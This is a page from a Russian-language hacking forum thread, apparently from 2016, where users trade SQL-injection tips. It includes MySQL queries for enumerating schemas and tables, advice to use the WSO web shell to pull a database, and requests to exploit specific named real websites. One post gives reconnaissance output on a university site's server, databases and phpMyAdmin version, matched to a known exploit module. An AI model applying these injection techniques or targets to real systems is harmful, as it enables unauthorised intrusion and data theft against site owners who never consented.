ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1481  
Старый 13.11.2016, 16:35
qqq1457
Познающий
Регистрация: 13.10.2016
Сообщений: 33
С нами: 5043926

Репутация: 0
По умолчанию

если в mysql

select schema_name from information_schema.schemata limit 0,1 - выводит названия бд далее limit 1,1 ; limit 2,1 и т д

select table_name from information_schema.tables where table_schema='название бд которую вывел в пред запросе'

или если не выводит в hex

select table_name from information_schema.tables where table_schema=0x002.....

/threads/43966/
 
Ответить с цитированием

  #1482  
Старый 14.11.2016, 02:40
hiderat
Новичок
Регистрация: 09.10.2016
Сообщений: 19
С нами: 5049686

Репутация: 0
По умолчанию

Подскажите как забрать базу sql если к ней нет доступа из инета?

Мож скриптик какой есть?

Provider=SQLOLEDB.1

Data Source=.\SQLEXPRESS
 
Ответить с цитированием

  #1483  
Старый 14.11.2016, 03:13
karkajoi
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
С нами: 5025206

Репутация: 5
По умолчанию

Цитата:
Сообщение от hiderat  

Подскажите как забрать базу sql если к ней нет доступа из инета?
Мож скриптик какой есть?
Provider=SQLOLEDB.1
Data Source=.\SQLEXPRESS
Скрипт называется WebShell (WSO), только он работает локально. В нем есть функция подключения к бд
 
Ответить с цитированием

  #1484  
Старый 14.11.2016, 20:09
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
С нами: 5710646

Репутация: 24


По умолчанию

Можно прочитать даныи фаил через скулю?прочитать?

http://icfi.ulim.md/blocks/db.php

http://icfi.ulim.md/alltopics.php?ca...,5,6,7,8,9+--+
 
Ответить с цитированием

  #1485  
Старый 15.11.2016, 00:15
EvilSQL
Новичок
Регистрация: 12.01.2016
Сообщений: 21
С нами: 5439926

Репутация: 3
По умолчанию

Цитата:
Сообщение от Octavian  

Можно прочитать даныи фаил через скулю?прочитать?
http://icfi.ulim.md/blocks/db.php
http://icfi.ulim.md/alltopics.php?ca...,5,6,7,8,9+--+
нет прочитать нельзя.

Код:
Web Server:     Apache/2.2.22 (Ubuntu)
Powered-by:     PHP/5.3.10-1ubuntu3.18
Current DB:     icfi
Data Bases:     information_schema
                     icfi
                     test

http://icfi.ulim.md/phpmyadmin/
http://icfi.ulim.md/phpmyadmin/Documentation.html
phpMyAdmin 3.4.10.1
phpMyAdmin 3.3.x / 3.4.x - Local File Inclusion via XXE Injection (Metasploit)
 
Ответить с цитированием

  #1486  
Старый 18.11.2016, 13:24
st55
Участник форума
Регистрация: 20.04.2016
Сообщений: 185
С нами: 5297366

Репутация: 47
По умолчанию

Столкнулся с небольшой проблемой при эксплуатации error-based инъекции. GET запрос лимитирован до 255 символов. Все доступные вектора больше этого лимита (короткие типа extractvalue, updatexml, bigint overflow - не работают). Подскажите пути решения проблемы.
 
Ответить с цитированием

  #1487  
Старый 18.11.2016, 13:25
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию

Попробуй уязвимый параметр передать через POST
 
Ответить с цитированием

  #1488  
Старый 18.11.2016, 13:29
st55
Участник форума
Регистрация: 20.04.2016
Сообщений: 185
С нами: 5297366

Репутация: 47
По умолчанию

Цитата:
Сообщение от winstrool  

Попробуй уязвимый параметр передать через POST
По-сути там даже не параметра. Только GET.
 
Ответить с цитированием

  #1489  
Старый 18.11.2016, 13:36
st55
Участник форума
Регистрация: 20.04.2016
Сообщений: 185
С нами: 5297366

Репутация: 47
По умолчанию

Цитата:
Сообщение от BabaDook  

sute.ru/index.php' такая чтоль уязвимость? или site.org/index.php/'
Второе.
 
Ответить с цитированием

  #1490  
Старый 19.11.2016, 00:46
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию

http://www.vitrinesvesoul.fr/annuaire.php?cat=5

через юнион как раскрутить ?
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.